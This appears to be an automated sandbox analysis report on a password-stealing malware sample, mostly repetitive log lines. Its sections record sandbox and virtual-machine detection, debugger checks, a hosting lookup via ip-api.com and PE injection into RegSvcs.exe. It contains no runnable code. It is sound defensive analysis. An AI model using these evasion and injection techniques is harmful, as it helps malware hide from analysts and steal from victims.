Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: 17D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: 7DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: 79A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: 8DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: 9DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: A380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: B380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory allocated: C380000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599226	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597777	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7943			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1897			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe TID: 7276

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599226	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597777	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: RegSvcs.exe, 00000002.00000002.4141211238.0000000005DBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_00E57EC8 CheckRemoteDebuggerPresent,

2_2_00E57EC8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 935008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
